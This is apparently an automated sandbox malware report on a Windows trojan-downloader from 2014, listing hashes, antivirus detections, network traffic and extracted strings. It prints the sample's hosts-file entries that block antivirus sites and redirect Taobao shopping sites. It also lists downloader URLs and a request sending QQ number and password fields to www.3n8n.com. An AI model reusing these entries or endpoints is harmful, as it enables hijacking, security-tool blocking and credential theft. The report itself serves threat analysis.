Analysis Date: 2014-11-06 23:05:17
MD5: 854a0059590470d84ccf65260b60c239
SHA1: c9911318abd733caa5aa199b14ced3b2e189b09a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 1f44003809744f86947a4f669e9a8e3b sha1: d0f1ba9b7d4df800c19b9912a6ae6c8666992b13 size: 229376
Section .rdata: md5: c76397807dcdfff0657fbb41a4d1d175 sha1: ddc0ffaa5bec9c46441345c44724ffb8ff26a30e size: 24576
Section .data: md5: 7a87fb557538f178b5391e330aa5a7a2 sha1: 179d68a928ecbef1d6a8fb203a0b0d06a8bb7453 size: 299008
Timestamp: 2014-10-11 08:34:40
Packer: Microsoft Visual C++ v6.0
PEhash: 1058231a9500d67f7d0ec084ea911acfb7e79b4f
IMPhash: aaf71dbf941c274857669d0172085dac
AV 360 Safe: Gen:Variant.Graftor.145274
AV Ad-Aware: Gen:Variant.Graftor.145274
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Trojan.YKCD-1322
AV Avira (antivir): TR/Hijack.557056
AV BullGuard: Gen:Variant.Graftor.145274
AV CA (E-Trust Ino): Win32/Oflwr.A!crypt
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Gen:Variant.Graftor.145274
AV Eset (nod32): Win32/Agent.WCF
AV Fortinet: W32/Agent.WCF!tr
AV Frisk (f-prot): no_virus
AV F-Secure: Gen:Variant.Graftor.145274
AV Grisoft (avg): Agent5.AQG
AV Ikarus: Trojan.Win32.Agent
AV K7: Trojan ( 0049c9161 )
AV Kaspersky: Trojan-Downloader.Win32.Generic:Trojan.Win32.Hosts2.gen
AV MalwareBytes: no_virus
AV Mcafee: RDN/Generic.dx!dgm
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): Gen:Variant.Graftor.145274
AV Norman: Gen:Variant.Graftor.145274
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝ http://www.2345.com/?k98792151\\x00
Registry: HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝ NULL
Creates File: C:\Program Files\Common Files\bdsd.jpg
Creates File: C:\Program Files\Common Files\appers_7_1958.exe
Creates File: C:\WINDOWS\system32\drivers\etc\hosts
Creates File: C:\Program Files\Common Files\Microsoft Shared\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
Creates File: C:\Program Files\Common Files\gqbb24_mt1.exe
Creates File: C:\Program Files\Common Files\tqrl_97_1957.exe
Creates File: C:\Program Files\Common Files\YoudaoDict_silent3.exe
Creates File: C:\Program Files\Common Files\OfficeAssist.0195.80.1054.exe
Creates File: C:\Program Files\Common Files\shanhu_7654_356.jpg
Creates File: C:\Program Files\Common Files\kt_b_80213.exe
Creates File: C:\Program Files\Common Files\qhse_7654_5943.jpg
Creates File: C:\Program Files\Common Files\setup_t10303.exe
Creates File: C:\Program Files\Common Files\setup_s1020.exe
Creates File: C:\Program Files\Common Files\asdqw_3104-48740.JPG
Creates File: C:\WINDOWS\system32\unrar.dll
Deletes File: C:\Program Files\Common Files\qhse_7654_5943.jpg
Deletes File: C:\Program Files\Common Files\bdsd.jpg
Deletes File: C:\Program Files\Common Files\Microsoft Shared\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
Winsock URL: http://d3.freep.cn/3tb_140917191931o0a2538987.jpg
Winsock URL: http://xz.dianxinshu.com/download/setup_s1020.exe
Winsock URL: http://down.9vh.net/appers_7_1958.exe
Winsock URL: http://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
Winsock URL: http://d3.freep.cn/3tb_141007222757xfui539918.jpg
Winsock URL: http://d3.freep.cn/3tb_140923192942q71f538987.jpg
Winsock URL: http://cdn.pcbeta.attachment.inimc.com/data/attachment/forum/201409/12/173937imav9yvcycn3akua.jpg
Winsock URL: http://down.qunasou.com/kt/kt_b_80213.exe
Winsock URL: http://wdl1.cache.wps.cn/wps/download/OfficeAssist.0195.80.1054.exe
Winsock URL: http://guangqu924.oss-cn-hangzhou.aliyuncs.com/gqbb24_mt1.exe
Winsock URL: http://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
Winsock URL: http://codown.youdao.com/cidian/YoudaoDict_silent3.exe
Winsock URL: http://www.3n8n.com/xin8/mail.asp?qqnumber=&qqpassword= 6
Winsock URL: http://down.tianyunxj.com/tqrl_97_1957.exe

Network Details:

DNS: webmirror.pcbeta.com (Type: A) ➝ 113.107.42.25
DNS: down.9vh.net (Type: A) ➝ 222.186.60.3
DNS: c06.i06.arnic.hadns.net (Type: A) ➝ 183.57.148.246
DNS: c06.i06.arnic.hadns.net (Type: A) ➝ 116.11.254.249
DNS: guangqu924.oss-cn-hangzhou.aliyuncs.com (Type: A) ➝ 42.120.230.9
DNS: 360.band.glb0.ldcache.net (Type: A) ➝ 183.61.19.169
DNS: bgp5.yandui.com (Type: A) ➝ 60.222.232.216
DNS: bgp5.yandui.com (Type: A) ➝ 222.186.60.10
DNS: bgp5.yandui.com (Type: A) ➝ 222.186.60.11
DNS: opt.dl.glb0.lxdns.com (Type: A) ➝ 70.39.191.87
DNS: bgp5.yandui.com (Type: A) ➝ 222.186.60.11
DNS: bgp5.yandui.com (Type: A) ➝ 60.222.232.216
DNS: bgp5.yandui.com (Type: A) ➝ 222.186.60.10
DNS: download036.rdb.cnc.ccgslb.com.cn (Type: A) ➝ 221.204.13.22
DNS: download036.rdb.cnc.ccgslb.com.cn (Type: A) ➝ 221.204.13.37
DNS: img.freep.cn (Type: A) ➝ 221.234.36.167
DNS: img.freep.cn (Type: A) ➝ 221.234.36.242
DNS: download.2345.com (Type: A) ➝ 60.191.223.2
DNS: download.2345.com (Type: A) ➝ 60.191.223.4
DNS: download.2345.com (Type: A) ➝ 60.191.223.15
DNS: download.2345.com (Type: A) ➝ 61.147.127.202
DNS: download.2345.com (Type: A) ➝ 61.147.127.203
DNS: download.2345.com (Type: A) ➝ 61.160.245.8
DNS: download.2345.com (Type: A) ➝ 61.160.245.11
DNS: download.2345.com (Type: A) ➝ 61.160.245.14
DNS: download.2345.com (Type: A) ➝ 122.228.248.3
DNS: download.2345.com (Type: A) ➝ 218.75.155.244
DNS: download.2345.com (Type: A) ➝ 60.191.187.15
DNS: www.3n8n.com (Type: A) ➝ 118.193.155.117
DNS: cdn.pcbeta.attachment.inimc.com (Type: A)
DNS: down.tianyunxj.com (Type: A)
DNS: down.xiaoxinrili.com (Type: A)
DNS: xz.dianxinshu.com (Type: A)
DNS: codown.youdao.com (Type: A)
DNS: down.qunasou.com (Type: A)
DNS: wdl1.cache.wps.cn (Type: A)
DNS: d3.freep.cn (Type: A)
DNS: jifendownload.2345.cn (Type: A)
HTTP GET: http://cdn.pcbeta.attachment.inimc.com/data/attachment/forum/201409/12/173937imav9yvcycn3akua.jpg
User-Agent:
HTTP GET: http://down.9vh.net/appers_7_1958.exe
User-Agent:
HTTP GET: http://down.tianyunxj.com/tqrl_97_1957.exe
User-Agent:
HTTP GET: http://guangqu924.oss-cn-hangzhou.aliyuncs.com/gqbb24_mt1.exe
User-Agent:
HTTP GET: http://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
User-Agent:
HTTP GET: http://xz.dianxinshu.com/download/setup_s1020.exe
User-Agent:
HTTP GET: http://codown.youdao.com/cidian/YoudaoDict_silent3.exe
User-Agent:
HTTP GET: http://down.qunasou.com/kt/kt_b_80213.exe
User-Agent:
HTTP GET: http://wdl1.cache.wps.cn/wps/download/OfficeAssist.0195.80.1054.exe
User-Agent:
HTTP GET: http://d3.freep.cn/3tb_140923192942q71f538987.jpg
User-Agent:
HTTP GET: http://d3.freep.cn/3tb_141007222757xfui539918.jpg
User-Agent:
HTTP GET: http://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
User-Agent:
HTTP GET: http://d3.freep.cn/3tb_140917191931o0a2538987.jpg
User-Agent:
HTTP GET: http://www.3n8n.com/xin8/mail.asp?qqnumber=&qqpassword=%20%206
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP: 192.168.1.1:1031 ➝ 113.107.42.25:80
Flows TCP: 192.168.1.1:1032 ➝ 222.186.60.3:80
Flows TCP: 192.168.1.1:1033 ➝ 183.57.148.246:80
Flows TCP: 192.168.1.1:1034 ➝ 42.120.230.9:80
Flows TCP: 192.168.1.1:1035 ➝ 183.61.19.169:80
Flows TCP: 192.168.1.1:1036 ➝ 60.222.232.216:80
Flows TCP: 192.168.1.1:1037 ➝ 70.39.191.87:80
Flows TCP: 192.168.1.1:1038 ➝ 222.186.60.11:80
Flows TCP: 192.168.1.1:1039 ➝ 221.204.13.22:80
Flows TCP: 192.168.1.1:1040 ➝ 221.234.36.167:80
Flows TCP: 192.168.1.1:1041 ➝ 221.234.36.167:80
Flows TCP: 192.168.1.1:1042 ➝ 60.191.223.2:80
Flows TCP: 192.168.1.1:1043 ➝ 221.234.36.167:80
Flows TCP: 192.168.1.1:1044 ➝ 118.193.155.117:80

Raw Pcap

Strings
0123456789abcdef
"@0123456789ABCDEF
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
%02.2d
%02d/%02d/%04d %02d:%02d:%02d.%03d 
%02u-%02u-%02u %02u:%02u
%02u-%02u-%u %02u:%02u
127.0.0.1   360.cn
127.0.0.1   bbs.360.cn
127.0.0.1   bbs.duba.net
127.0.0.1   bbs.ikaka.com
127.0.0.1   bbs.janmeng.com
127.0.0.1   bbs.kafan.cn
127.0.0.1   bbs.sanfans.com
127.0.0.1   bbs.sd.keniu.com
127.0.0.1   bbs.shadu007.com
127.0.0.1   bbs.taobao.com
127.0.0.1   bbs.vc52.cn
127.0.0.1   cd001.www.duba.net
127.0.0.1   club.alimama.com
127.0.0.1   forum.taobao.com
127.0.0.1   lt.ijinshan.com
127.0.0.1   taoke.alimama.com
127.0.0.1   www.360.cn
127.0.0.1   www.alimama.com
127.0.0.1   www.ijinshan.com
127.0.0.1   www.kafan.cn
127.0.0.1   www.kpfans.com
127.0.0.1   www.shadu007.coC:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1   www.shadu007.com
127.0.0.1   www.virscan.org
1#QNAN
1#SNAN
219.235.1.101   517xky.webnode.cn
219.235.1.101   bijibendiannao.blog.china.com
219.235.1.101   cpro.baidu.com
219.235.1.101   diannao.nav123.com
219.235.1.101   mall.yi85.com
219.235.1.101   shouji.tbw.net.cn
219.235.1.101   tbwwsgwdn.tao132.cn
219.235.1.101   www.66taoke.com
219.235.1.101   www.77taoba.com
219.235.1.101   www.91kd.cn
219.235.1.101   www.949528.cn
219.235.1.101   www.cntorg.com
219.235.1.101   www.haixitaoke.com
219.235.1.101   www.hl-sms.cn
219.235.1.101   www.lizhishu.com
219.235.1.101   www.mbaobao.com
219.235.1.101   www.mbbw.info
219.235.1.101   www.mvptaoke.com
219.235.1.101   www.nongyecn.com
219.235.1.101   www.pg8.cn
219.235.1.101   www.qiangdiannao.cn
219.235.1.101   www.shopnokia.info
219.235.1.101   www.sjxun.com
219.235.1.101   www.sugouwu.com
219.235.1.101   www.taobao.com
219.235.1.101   www.taobao-mo.com
219.235.1.101   www.taobao-shouji.com
219.235.1.101   www.taok.cc
219.235.1.101   www.taoke.info
219.235.1.101   www.taoke.la
219.235.1.101   www.taokw.com
219.235.1.101   www.ttcome.cn
219.235.1.101   www.ywaili.com
 2345zhen
%2\CLSID
%2\DocObject
%2\Insertable
2n1r1v1z1~1
%2\protocol\StdFileEditing\server
%2\protocol\StdFileEditing\verb\0
   360SE
.4.7.lnk
70c2441db366d92ea7be1342b3bf629026ba92bb675f06e684bdd34511097434
_7654_356.exe
_7654_5943.exe
a538f494a2afdb0ca5c008d34100dc71cb684672c0c511da8d95d38642fc2360
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
%A, %B %d, %Y
abnormal program termination
Abnormal program termination
AdjustTokenPrivileges
AdjustWindowRectEx
ADSafe3.lnk
advapi32.dll
Advapi32.dll
ADVAPI32.dll
ADVAPI32.DLL
AfxControlBar42s
AfxFrameOrView42s
AfxMDIFrame42s
AfxOldWndProc423
AfxOleControl42s
AfxWnd42s
   Aguangshushurufazhen
An application has made an attempt to load the C runtime library incorrectly.
An exception (%08X) occurred during DllEntryPoint or DllMain in module:
AppendMenuA
Archive
Archive *
Arg list too big
Array<char>
Array<char> *
Array<int>
Array<int> *
Array<__int64>
Array<__int64> *
Array<UnpackFilter *>
Array<UnpackFilter *> *
Array<unsigned char>
Array<unsigned char> *
Array<VM_PreparedCommand>
Array<VM_PreparedCommand> *
Array<wchar_t>
Array<wchar_t> *
AsDefault=0
AsDefault=1
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="2345.com" type="win32"></assemblyIdentity><description>2345.com</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS></application></compatibility></assembly>
C:\Program Files\Common Files\Microsoft Shared\autoinstall.exe
AtlAxWinInit
atl.dll
ATL.DLL
Attempted to remove current directory
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
.?AUCThreadData@@
August
.?AUIMessageFilter@@
.?AUIUnknown@@
.?AV_AFX_BASE_MODULE_STATE@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_OLE_STATE@@
.?AV_AFX_THREAD_STATE@@
.?AV_AFX_WIN_STATE@@
.?AVbad_alloc@std@@
.?AVbad_exception@std@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCommonDialog@@
.?AVCDC@@
.?AVCDialog@@
.?AVCException@@
.?AVCGdiObject@@
.?AVCHandleMap@@
.?AVCMapPtrToPtr@@
.?AVCMemoryException@@
.?AVCMenu@@
.?AVCNoTrackObject@@
.?AVCNotSupportedException@@
.?AVCObject@@
.?AVCOleBusyDialog@@
.?AVCOleDialog@@
.?AVCOleMessageFilter@@
.?AVCResourceException@@
.?AVCSimpleException@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCTempMenu@@
.?AVCTempWnd@@
.?AVCTestCmdUI@@
.?AVCUserException@@
.?AVCWinApp@@
.?AVCWinThread@@
.?AVCWnd@@
.?AVexception@std@@
.?AVlength_error@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVXMessageFilter@COleMessageFilter@@
Bad address
bad_alloc *
bad allocation
bad alloc exception thrown
bad exception
bad exception thrown
Bad file number
BaiduAnTray.exe
\BaiduAnUpdate.exe
  baiduSD
BaiduSdTray.exe
\BaiduSdUpdate.exe
BaseBlock
 Base Class Array'
 Base Class Descriptor at (
__based(
BBFFf;
**BCCxh1
BeginPaint
BitBlt
BitInput
BitInput *
blackmoon
BlackMoon RunTime Error:
Block device required
BlockHeader
BlueBox.exe
BlueSoftSetup_bsugqr.exe
Borland32
Borland C++ - Copyright 1999 Inprise Corporation
borlndmm
@Borlndmm@SysFreeMem$qqrpv
@Borlndmm@SysGetMem$qqri
@Borlndmm@SysReallocMem$qqrpvi
Broken pipe
CallNextHookEx
CallWindowProcA
Cannot run multiple instances of a DLL under WIN32s
C:\bdkv_install.log
C:\BlueSoftSetup.log
CCmdTarget
C,;C$s/
__cdecl
CDialog
C:\Documents and Settings\administrator\
C:\Documents and Settings\Administrator\
C:\Documents and Settings\Administrator\Application Data\360se6\Application\360se.exe
C:\Documents and Settings\Administrator\Application Data\360se6\Application\6.3.1.153\installer\setup.exe
C:\Documents and Settings\Administrator\Local Settings\Application Data\Kingsoft\WPS Office\9.1.0.4463\utility\uninst.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\bluefiles
C:\Documents and Settings\All Users\
C:\DuDu\uninstall.exe
CException
CGdiObject
CharLowerA
CharLowerW
CharToOemA
CharToOemBuffA
CharUpperA
CharUpperW
CheckedValue
CheckMenuItem
CheckMenuRadioItem
Chrome=0
 Class Hierarchy Descriptor'
ClientToScreen
CloseHandle
ClosePrinter
__clrcall
     cls
CLSID\%1
CLSID\%1\AuxUserType\2
CLSID\%1\AuxUserType\3
CLSID\%1\DefaultExtension
CLSID\%1\DefaultIcon
CLSID\%1\DocObject
CLSID\%1\InprocHandler32
CLSID\%1\InProcServer32
CLSID\%1\Insertable
CLSID\%1\LocalServer32
CLSID\%1\MiscStatus
CLSID\%1\Printable
CLSID\%1\ProgID
CLSID\%1\Verb\0
CLSID\%1\Verb\1
CLSIDFromProgID
CLSIDFromString
CMapPtrToPtr
CmdExtract
CmdExtract *
CMemoryException
CNotSupportedException
CObject
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
COleBusyDialog
COleDialog
CombineRgn
combobox
COMCTL32.dll
COMCTL32.DLL
comdlg32.dll